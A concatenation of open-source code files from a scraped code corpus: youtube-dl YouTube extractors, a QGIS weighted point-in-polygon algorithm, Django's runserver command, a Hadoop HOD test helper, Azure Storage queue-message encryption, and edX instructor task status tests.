'url': 'https://www.youtube.com/results?baz=bar&search_query=youtube-dl+test+video&filters=video&lclk=video',
'playlist_mincount': 5,
'info_dict': {
'title': 'youtube-dl test video',
}
}, {
'url': 'https://www.youtube.com/results?q=test&sp=EgQIBBgB',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
query = compat_urllib_parse_unquote_plus(mobj.group('query'))
webpage = self._download_webpage(url, query)
return self.playlist_result(self._process_page(webpage), playlist_title=query)
class YoutubeShowIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com (multi-season) shows'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/show/(?P<id>[^?#]*)'
IE_NAME = 'youtube:show'
_TESTS = [{
'url': 'https://www.youtube.com/show/airdisasters',
'playlist_mincount': 5,
'info_dict': {
'id': 'airdisasters',
'title': 'Air Disasters',
}
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
return super(YoutubeShowIE, self)._real_extract(
'https://www.youtube.com/show/%s/playlists' % playlist_id)
class YoutubeFeedsInfoExtractor(YoutubeBaseInfoExtractor):
"""
Base class for feed extractors
Subclasses must define the _FEED_NAME and _PLAYLIST_TITLE properties.
"""
_LOGIN_REQUIRED = True
@property
def IE_NAME(self):
return 'youtube:%s' % self._FEED_NAME
def _real_initialize(self):
self._login()
def _entries(self, page):
# The extraction process is the same as for playlists, but the regex
# for the video ids doesn't contain an index
ids = []
more_widget_html = content_html = page
for page_num in itertools.count(1):
matches = re.findall(r'href="\s*/watch\?v=([0-9A-Za-z_-]{11})', content_html)
# 'recommended' feed has infinite 'load more' and each new portion spins
# the same videos in (sometimes) slightly different order, so we'll check
# for unicity and break when portion has no new videos
new_ids = list(filter(lambda video_id: video_id not in ids, orderedSet(matches)))
if not new_ids:
break
ids.extend(new_ids)
for entry in self._ids_to_results(new_ids):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), self._PLAYLIST_TITLE,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
more_widget_html = more['load_more_widget_html']
def _real_extract(self, url):
page = self._download_webpage(
'https://www.youtube.com/feed/%s' % self._FEED_NAME,
self._PLAYLIST_TITLE)
return self.playlist_result(
self._entries(page), playlist_title=self._PLAYLIST_TITLE)
class YoutubeWatchLaterIE(YoutubePlaylistIE):
IE_NAME = 'youtube:watchlater'
IE_DESC = 'Youtube watch later list, ":ytwatchlater" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/(?:feed/watch_later|(?:playlist|watch)\?(?:.+&)?list=WL)|:ytwatchlater'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=WL',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?v=bCNU9TrbiRk&index=1&list=WL',
'only_matching': True,
}]
def _real_extract(self, url):
_, video = self._check_download_just_video(url, 'WL')
if video:
return video
_, playlist = self._extract_playlist('WL')
return playlist
class YoutubeFavouritesIE(YoutubeBaseInfoExtractor):
IE_NAME = 'youtube:favorites'
IE_DESC = 'YouTube.com favourite videos, ":ytfav" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/my_favorites|:ytfav(?:ou?rites)?'
_LOGIN_REQUIRED = True
def _real_extract(self, url):
webpage = self._download_webpage('https://www.youtube.com/my_favorites', 'Youtube Favourites videos')
playlist_id = self._search_regex(r'list=(.+?)["&]', webpage, 'favourites playlist id')
return self.url_result(playlist_id, 'YoutubePlaylist')
class YoutubeRecommendedIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com recommended videos, ":ytrec" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/recommended|:ytrec(?:ommended)?'
_FEED_NAME = 'recommended'
_PLAYLIST_TITLE = 'Youtube Recommended videos'
class YoutubeSubscriptionsIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com subscriptions feed, "ytsubs" keyword (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/subscriptions|:ytsubs(?:criptions)?'
_FEED_NAME = 'subscriptions'
_PLAYLIST_TITLE = 'Youtube Subscriptions'
class YoutubeHistoryIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'Youtube watch history, ":ythistory" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/history|:ythistory'
_FEED_NAME = 'history'
_PLAYLIST_TITLE = 'Youtube History'
class YoutubeTruncatedURLIE(InfoExtractor):
IE_NAME = 'youtube:truncated_url'
IE_DESC = False # Do not list
_VALID_URL = r'''(?x)
(?:https?://)?
(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/
(?:watch\?(?:
feature=[a-z_]+|
annotation_id=annotation_[^&]+|
x-yt-cl=[0-9]+|
hl=[^&]*|
t=[0-9]+
)?
|
attribution_link\?a=[^&]+
)
$
'''
_TESTS = [{
'url': 'https://www.youtube.com/watch?annotation_id=annotation_3951667041',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?x-yt-cl=84503534',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?feature=foo',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?hl=en-GB',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?t=2372',
'only_matching': True,
}]
def _real_extract(self, url):
raise ExtractorError(
'Did you forget to quote the URL? Remember that & is a meta '
'character in most shells, so you want to put the URL in quotes, '
'like youtube-dl '
'"https://www.youtube.com/watch?feature=foo&v=BaW_jenozKc" '
' or simply youtube-dl BaW_jenozKc .',
expected=True)
class YoutubeTruncatedIDIE(InfoExtractor):
IE_NAME = 'youtube:truncated_id'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/watch\?v=(?P<id>[0-9A-Za-z_-]{1,10})$'
_TESTS = [{
'url': 'https://www.youtube.com/watch?v=N_708QY7Ob',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
raise ExtractorError(
'Incomplete YouTube ID %s. URL %s looks truncated.' % (video_id, url),
expected=True)
| gpl-3.0 | -7,517,958,334,063,962,000 | 44.275542 | 348 | 0.505638 | false |
michaelkirk/QGIS | python/plugins/processing/algs/qgis/PointsInPolygonWeighted.py | 1 | 5085 | # -*- coding: utf-8 -*-
"""
***************************************************************************
    PointsInPolygonWeighted.py
    --------------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QgsField, QgsFeatureRequest, QgsFeature, QgsGeometry
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterString
from processing.core.parameters import ParameterTableField
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
class PointsInPolygonWeighted(GeoAlgorithm):
POLYGONS = 'POLYGONS'
POINTS = 'POINTS'
OUTPUT = 'OUTPUT'
FIELD = 'FIELD'
WEIGHT = 'WEIGHT'
# =========================================================================
# def getIcon(self):
# return QIcon(os.path.dirname(__file__) + "/icons/sum_points.png")
# =========================================================================
def defineCharacteristics(self):
        self.name, self.i18n_name = self.trAlgorithm('Count points in polygon (weighted)')
self.group, self.i18n_group = self.trAlgorithm('Vector analysis tools')
self.addParameter(ParameterVector(self.POLYGONS,
self.tr('Polygons'), [ParameterVector.VECTOR_TYPE_POLYGON]))
self.addParameter(ParameterVector(self.POINTS,
self.tr('Points'), [ParameterVector.VECTOR_TYPE_POINT]))
self.addParameter(ParameterTableField(self.WEIGHT,
self.tr('Weight field'), self.POINTS))
self.addParameter(ParameterString(self.FIELD,
self.tr('Count field name'), 'NUMPOINTS'))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Weighted count')))
def processAlgorithm(self, progress):
polyLayer = dataobjects.getObjectFromUri(self.getParameterValue(self.POLYGONS))
pointLayer = dataobjects.getObjectFromUri(self.getParameterValue(self.POINTS))
fieldName = self.getParameterValue(self.FIELD)
fieldIdx = pointLayer.fieldNameIndex(self.getParameterValue(self.WEIGHT))
polyProvider = polyLayer.dataProvider()
fields = polyProvider.fields()
fields.append(QgsField(fieldName, QVariant.Int))
(idxCount, fieldList) = vector.findOrCreateField(polyLayer,
polyLayer.pendingFields(), fieldName)
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(
fields.toList(), polyProvider.geometryType(), polyProvider.crs())
spatialIndex = vector.spatialindex(pointLayer)
ftPoint = QgsFeature()
outFeat = QgsFeature()
geom = QgsGeometry()
current = 0
hasIntersections = False
features = vector.features(polyLayer)
total = 100.0 / float(len(features))
for ftPoly in features:
geom = ftPoly.geometry()
attrs = ftPoly.attributes()
count = 0
hasIntersections = False
points = spatialIndex.intersects(geom.boundingBox())
if len(points) > 0:
hasIntersections = True
if hasIntersections:
progress.setText(str(len(points)))
for i in points:
request = QgsFeatureRequest().setFilterFid(i)
ftPoint = pointLayer.getFeatures(request).next()
tmpGeom = QgsGeometry(ftPoint.geometry())
if geom.contains(tmpGeom):
weight = str(ftPoint.attributes()[fieldIdx])
try:
count += float(weight)
                    except ValueError:
                        # Ignore fields with non-numeric values
                        pass
outFeat.setGeometry(geom)
if idxCount == len(attrs):
attrs.append(count)
else:
attrs[idxCount] = count
outFeat.setAttributes(attrs)
writer.addFeature(outFeat)
current += 1
progress.setPercentage(int(current * total))
del writer
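# Illustrative usage sketch (not part of the original file): the algorithm is
# normally run through the Processing framework rather than instantiated
# directly. The algorithm id, the layer variables and the weight field name
# below are assumptions for illustration only.
#
#   import processing
#   processing.runalg('qgis:countpointsinpolygonweighted',
#                     polygon_layer,        # POLYGONS
#                     point_layer,          # POINTS
#                     'population',         # WEIGHT field (hypothetical)
#                     'NUMPOINTS',          # FIELD (count field name)
#                     '/tmp/weighted.shp')  # OUTPUT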
| gpl-2.0 | -7,380,120,518,761,429,000 | 38.726563 | 89 | 0.551426 | false |
xrg/django-static-gitified | django/core/management/commands/runserver.py | 77 | 5859 | from optparse import make_option
import os
import re
import sys
import socket
from django.core.management.base import BaseCommand, CommandError
from django.core.servers.basehttp import AdminMediaHandler, run, WSGIServerException, get_internal_wsgi_application
from django.utils import autoreload
naiveip_re = re.compile(r"""^(?:
(?P<addr>
(?P<ipv4>\d{1,3}(?:\.\d{1,3}){3}) | # IPv4 address
(?P<ipv6>\[[a-fA-F0-9:]+\]) | # IPv6 address
(?P<fqdn>[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*) # FQDN
):)?(?P<port>\d+)$""", re.X)
DEFAULT_PORT = "8000"
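# A few examples of what naiveip_re accepts (shown for documentation only):
#
#   re.match(naiveip_re, '8000')            # addr None, port '8000'
#   re.match(naiveip_re, '0.0.0.0:8000')    # IPv4 address plus port
#   re.match(naiveip_re, '[::1]:8000')      # bracketed IPv6 address plus port
#   re.match(naiveip_re, 'localhost:8000')  # FQDN plus port
#
# handle() below strips the brackets from IPv6 addresses before use.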
class BaseRunserverCommand(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--ipv6', '-6', action='store_true', dest='use_ipv6', default=False,
help='Tells Django to use a IPv6 address.'),
make_option('--nothreading', action='store_false', dest='use_threading', default=True,
help='Tells Django to NOT use threading.'),
make_option('--noreload', action='store_false', dest='use_reloader', default=True,
help='Tells Django to NOT use the auto-reloader.'),
)
help = "Starts a lightweight Web server for development."
args = '[optional port number, or ipaddr:port]'
# Validation is called explicitly each time the server is reloaded.
requires_model_validation = False
def get_handler(self, *args, **options):
"""
Returns the default WSGI handler for the runner.
"""
return get_internal_wsgi_application()
def handle(self, addrport='', *args, **options):
self.use_ipv6 = options.get('use_ipv6')
if self.use_ipv6 and not socket.has_ipv6:
raise CommandError('Your Python does not support IPv6.')
if args:
raise CommandError('Usage is runserver %s' % self.args)
self._raw_ipv6 = False
if not addrport:
self.addr = ''
self.port = DEFAULT_PORT
else:
m = re.match(naiveip_re, addrport)
if m is None:
raise CommandError('"%s" is not a valid port number '
'or address:port pair.' % addrport)
self.addr, _ipv4, _ipv6, _fqdn, self.port = m.groups()
if not self.port.isdigit():
raise CommandError("%r is not a valid port number." % self.port)
if self.addr:
if _ipv6:
self.addr = self.addr[1:-1]
self.use_ipv6 = True
self._raw_ipv6 = True
elif self.use_ipv6 and not _fqdn:
raise CommandError('"%s" is not a valid IPv6 address.' % self.addr)
if not self.addr:
self.addr = self.use_ipv6 and '::1' or '127.0.0.1'
self._raw_ipv6 = bool(self.use_ipv6)
self.run(*args, **options)
def run(self, *args, **options):
"""
Runs the server, using the autoreloader if needed
"""
use_reloader = options.get('use_reloader')
if use_reloader:
autoreload.main(self.inner_run, args, options)
else:
self.inner_run(*args, **options)
def inner_run(self, *args, **options):
from django.conf import settings
from django.utils import translation
threading = options.get('use_threading')
shutdown_message = options.get('shutdown_message', '')
quit_command = (sys.platform == 'win32') and 'CTRL-BREAK' or 'CONTROL-C'
self.stdout.write("Validating models...\n\n")
self.validate(display_num_errors=True)
self.stdout.write((
"Django version %(version)s, using settings %(settings)r\n"
"Development server is running at http://%(addr)s:%(port)s/\n"
"Quit the server with %(quit_command)s.\n"
) % {
"version": self.get_version(),
"settings": settings.SETTINGS_MODULE,
"addr": self._raw_ipv6 and '[%s]' % self.addr or self.addr,
"port": self.port,
"quit_command": quit_command,
})
# django.core.management.base forces the locale to en-us. We should
# set it up correctly for the first request (particularly important
# in the "--noreload" case).
translation.activate(settings.LANGUAGE_CODE)
try:
handler = self.get_handler(*args, **options)
run(self.addr, int(self.port), handler,
ipv6=self.use_ipv6, threading=threading)
except WSGIServerException, e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
13: "You don't have permission to access that port.",
98: "That port is already in use.",
99: "That IP address can't be assigned-to.",
}
try:
error_text = ERRORS[e.args[0].args[0]]
except (AttributeError, KeyError):
error_text = str(e)
sys.stderr.write(self.style.ERROR("Error: %s" % error_text) + '\n')
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
self.stdout.write("%s\n" % shutdown_message)
sys.exit(0)
class Command(BaseRunserverCommand):
option_list = BaseRunserverCommand.option_list + (
make_option('--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.'),
)
def get_handler(self, *args, **options):
"""
Serves admin media like old-school (deprecation pending).
"""
handler = super(Command, self).get_handler(*args, **options)
return AdminMediaHandler(handler, options.get('admin_media_path'))
| bsd-3-clause | 7,937,914,613,567,935,000 | 40.260563 | 115 | 0.574501 | false |
dongpf/hadoop-0.19.1 | src/contrib/hod/testing/helper.py | 182 | 1122 | #Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import sys
sampleText = "Hello World!"
if __name__=="__main__":
args = sys.argv[1:]
if args[0] == "1":
    # print sample text to stdout
sys.stdout.write(sampleText)
elif args[0] == "2":
# print sample text to stderr
sys.stderr.write(sampleText)
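  elif args[0] == "3":
    # Illustrative extension only (not part of the original helper): write the
    # sample text to both streams, following the pattern suggested below.
    sys.stdout.write(sampleText)
    sys.stderr.write(sampleText)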
# Add any other helper programs here, with different values for args[0]
pass
| apache-2.0 | -7,826,313,136,662,599,000 | 33 | 73 | 0.73975 | false |
dstrockis/outlook-autocategories | lib/azure/storage/queue/_encryption.py | 1 | 7544 | #-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from azure.common import (
AzureException,
)
from .._constants import (
_ENCRYPTION_PROTOCOL_V1,
)
from .._encryption import (
_generate_encryption_data_dict,
_dict_to_encryption_data,
_generate_AES_CBC_cipher,
_validate_and_unwrap_cek,
_EncryptionAlgorithm,
)
from json import (
dumps,
loads,
)
from base64 import(
b64encode,
b64decode,
)
from .._error import(
_ERROR_UNSUPPORTED_ENCRYPTION_VERSION,
_ERROR_DECRYPTION_FAILURE,
_ERROR_DATA_NOT_ENCRYPTED,
_ERROR_UNSUPPORTED_ENCRYPTION_ALGORITHM,
_validate_not_none,
_validate_key_encryption_key_wrap,
_validate_key_encryption_key_unwrap,
_validate_encryption_protocol_version,
_validate_kek_id,
)
from .._common_conversion import (
_encode_base64,
_decode_base64_to_bytes
)
from cryptography.hazmat.primitives.padding import PKCS7
import os
def _encrypt_queue_message(message, key_encryption_key):
'''
Encrypts the given plain text message using AES256 in CBC mode with 128 bit padding.
Wraps the generated content-encryption-key using the user-provided key-encryption-key (kek).
Returns a json-formatted string containing the encrypted message and the encryption metadata.
:param object message:
        The plain text message to be encrypted.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
wrap_key(key)--wraps the specified key using an algorithm of the user's choice.
get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key.
get_kid()--returns a string key id for this key-encryption-key.
:return: A json-formatted string containing the encrypted message and the encryption metadata.
:rtype: str
'''
_validate_not_none('message', message)
_validate_not_none('key_encryption_key', key_encryption_key)
_validate_key_encryption_key_wrap(key_encryption_key)
# AES256 uses 256 bit (32 byte) keys and always with 16 byte blocks
content_encryption_key = os.urandom(32)
initialization_vector = os.urandom(16)
# Queue encoding functions all return unicode strings, and encryption should
# operate on binary strings.
message = message.encode('utf-8')
cipher = _generate_AES_CBC_cipher(content_encryption_key, initialization_vector)
# PKCS7 with 16 byte blocks ensures compatibility with AES.
padder = PKCS7(128).padder()
padded_data = padder.update(message) + padder.finalize()
# Encrypt the data.
encryptor = cipher.encryptor()
encrypted_data = encryptor.update(padded_data) + encryptor.finalize()
# Build the dictionary structure.
queue_message = {}
queue_message['EncryptedMessageContents'] = _encode_base64(encrypted_data)
queue_message['EncryptionData'] = _generate_encryption_data_dict(key_encryption_key,
content_encryption_key,
initialization_vector)
return dumps(queue_message)
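# Minimal sketch (not part of the original module) of a key-encryption-key
# object satisfying the interface documented above; the class name, the wrap
# algorithm label and the _wrap helper are illustrative assumptions only.
#
#   class KeyWrapper(object):
#       def __init__(self, kid, wrapping_key):
#           self.kid = kid                    # caller-chosen key id string
#           self.wrapping_key = wrapping_key  # caller-managed secret
#       def wrap_key(self, key):
#           return _wrap(self.wrapping_key, key)  # hypothetical helper
#       def get_key_wrap_algorithm(self):
#           return 'A256KW'
#       def get_kid(self):
#           return self.kid
#
#   encrypted = _encrypt_queue_message(u'hello', KeyWrapper('key1', my_secret))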
def _decrypt_queue_message(message, require_encryption, key_encryption_key, resolver):
'''
Returns the decrypted message contents from an EncryptedQueueMessage.
If no encryption metadata is present, will return the unaltered message.
:param str message:
The JSON formatted QueueEncryptedMessage contents with all associated metadata.
:param bool require_encryption:
If set, will enforce that the retrieved messages are encrypted and decrypt them.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
unwrap_key(key, algorithm)--returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
get_kid()--returns a string key id for this key-encryption-key.
:param function resolver(kid):
The user-provided key resolver. Uses the kid string to return a key-encryption-key implementing the interface defined above.
:return: The plain text message from the queue message.
:rtype: str
'''
try:
message = loads(message)
encryption_data = _dict_to_encryption_data(message['EncryptionData'])
decoded_data = _decode_base64_to_bytes(message['EncryptedMessageContents'])
except (KeyError, ValueError) as e:
# Message was not json formatted and so was not encrypted
# or the user provided a json formatted message.
if require_encryption:
            raise ValueError(_ERROR_DATA_NOT_ENCRYPTED)
else:
return message
try:
return _decrypt(decoded_data, encryption_data, key_encryption_key, resolver).decode('utf-8')
except Exception as e:
raise AzureException(_ERROR_DECRYPTION_FAILURE)
def _decrypt(message, encryption_data, key_encryption_key=None, resolver=None):
'''
Decrypts the given ciphertext using AES256 in CBC mode with 128 bit padding.
    Unwraps the content-encryption-key using the user-provided or resolved key-encryption-key (kek). Returns the original plaintext.
:param str message:
The ciphertext to be decrypted.
:param _EncryptionData encryption_data:
The metadata associated with this ciphertext.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
unwrap_key(key, algorithm)--returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
get_kid()--returns a string key id for this key-encryption-key.
:param function resolver(kid):
The user-provided key resolver. Uses the kid string to return a key-encryption-key implementing the interface defined above.
:return: The decrypted plaintext.
:rtype: str
'''
_validate_not_none('message', message)
content_encryption_key = _validate_and_unwrap_cek(encryption_data, key_encryption_key, resolver)
if not ( _EncryptionAlgorithm.AES_CBC_256 == encryption_data.encryption_agent.encryption_algorithm):
raise ValueError(_ERROR_UNSUPPORTED_ENCRYPTION_ALGORITHM)
cipher = _generate_AES_CBC_cipher(content_encryption_key, encryption_data.content_encryption_IV)
#decrypt data
decrypted_data = message
decryptor = cipher.decryptor()
decrypted_data = (decryptor.update(decrypted_data) + decryptor.finalize())
#unpad data
unpadder = PKCS7(128).unpadder()
decrypted_data = (unpadder.update(decrypted_data) + unpadder.finalize())
return decrypted_data | apache-2.0 | -5,437,619,816,642,808,000 | 41.618497 | 132 | 0.678685 | false |
olexiim/edx-platform | lms/djangoapps/instructor_task/tests/test_views.py | 204 | 17817 |
"""
Test for LMS instructor background task views.
"""
import json
from celery.states import SUCCESS, FAILURE, REVOKED, PENDING
from mock import Mock, patch
from django.utils.datastructures import MultiValueDict
from instructor_task.models import PROGRESS
from instructor_task.tests.test_base import (InstructorTaskTestCase,
TEST_FAILURE_MESSAGE,
TEST_FAILURE_EXCEPTION)
from instructor_task.views import instructor_task_status, get_task_completion_info
class InstructorTaskReportTest(InstructorTaskTestCase):
"""
Tests view methods that involve the reporting of status for background tasks.
"""
def _get_instructor_task_status(self, task_id):
"""Returns status corresponding to task_id via api method."""
request = Mock()
request.REQUEST = {'task_id': task_id}
return instructor_task_status(request)
def test_instructor_task_status(self):
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
def test_missing_instructor_task_status(self):
task_id = "missing_id"
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output, {})
def test_instructor_task_status_list(self):
# Fetch status for existing tasks by arg list, as if called from ajax.
# Note that ajax does something funny with the marshalling of
# list data, so the key value has "[]" appended to it.
task_ids = [(self._create_failure_entry()).task_id for _ in range(1, 5)]
request = Mock()
request.REQUEST = MultiValueDict({'task_ids[]': task_ids})
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(len(output), len(task_ids))
for task_id in task_ids:
self.assertEquals(output[task_id]['task_id'], task_id)
def test_get_status_from_failure(self):
# get status for a task that has already failed
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], TEST_FAILURE_MESSAGE)
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': TEST_FAILURE_EXCEPTION,
'message': TEST_FAILURE_MESSAGE,
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_success(self):
# get status for a task that has already succeeded
instructor_task = self._create_success_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'total': 5,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_legacy_success(self):
# get status for a task that had already succeeded, back at a time
# when 'updated' was used instead of the preferred 'succeeded'.
legacy_progress = {
'attempted': 3,
'updated': 2,
'total': 5,
'action_name': 'rescored',
}
instructor_task = self._create_entry(task_state=SUCCESS, task_output=legacy_progress)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
self.assertEquals(output['task_progress'], legacy_progress)
def _create_email_subtask_entry(self, total=5, attempted=3, succeeded=2, skipped=0, task_state=PROGRESS):
"""Create an InstructorTask with subtask defined and email argument."""
progress = {'attempted': attempted,
'succeeded': succeeded,
'skipped': skipped,
'total': total,
'action_name': 'emailed',
}
instructor_task = self._create_entry(task_state=task_state, task_output=progress)
instructor_task.subtasks = {}
instructor_task.task_input = json.dumps({'email_id': 134})
instructor_task.save()
return instructor_task
def test_get_status_from_subtasks(self):
# get status for a task that is in progress, with updates
# from subtasks.
instructor_task = self._create_email_subtask_entry(skipped=1)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Progress: emailed 2 of 3 so far (skipping 1) (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'skipped': 1,
'total': 5,
'action_name': 'emailed',
}
self.assertEquals(output['task_progress'], expected_progress)
def _test_get_status_from_result(self, task_id, mock_result=None):
"""
Provides mock result to caller of instructor_task_status, and returns resulting output.
"""
with patch('celery.result.AsyncResult.__new__') as mock_result_ctor:
mock_result_ctor.return_value = mock_result
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
return output
def test_get_status_to_pending(self):
# get status for a task that hasn't begun to run yet
instructor_task = self._create_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PENDING
output = self._test_get_status_from_result(task_id, mock_result)
for key in ['message', 'succeeded', 'task_progress']:
self.assertTrue(key not in output)
self.assertEquals(output['task_state'], 'PENDING')
self.assertTrue(output['in_progress'])
def test_update_progress_to_progress(self):
# view task entry for task in progress
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PROGRESS
mock_result.result = {
'attempted': 5,
'succeeded': 4,
'total': 10,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Progress: rescored 4 of 5 so far (out of 10)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
self.assertEquals(output['task_progress'], mock_result.result)
def test_update_progress_to_failure(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = FAILURE
mock_result.result = NotImplementedError("This task later failed.")
mock_result.traceback = "random traceback"
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "This task later failed.")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': 'NotImplementedError',
'message': "This task later failed.",
'traceback': "random traceback",
}
self.assertEquals(output['task_progress'], expected_progress)
def test_update_progress_to_revoked(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = REVOKED
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Task revoked before running")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], REVOKED)
self.assertFalse(output['in_progress'])
expected_progress = {'message': "Task revoked before running"}
self.assertEquals(output['task_progress'], expected_progress)
def _get_output_for_task_success(self, attempted, succeeded, total, student=None):
"""returns the task_id and the result returned by instructor_task_status()."""
# view task entry for task in progress
instructor_task = self._create_progress_entry(student)
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = SUCCESS
mock_result.result = {
'attempted': attempted,
'succeeded': succeeded,
'total': total,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
return output
def _get_email_output_for_task_success(self, attempted, succeeded, total, skipped=0):
"""returns the result returned by instructor_task_status()."""
instructor_task = self._create_email_subtask_entry(
total=total,
attempted=attempted,
succeeded=succeeded,
skipped=skipped,
task_state=SUCCESS,
)
return self._test_get_status_from_result(instructor_task.task_id)
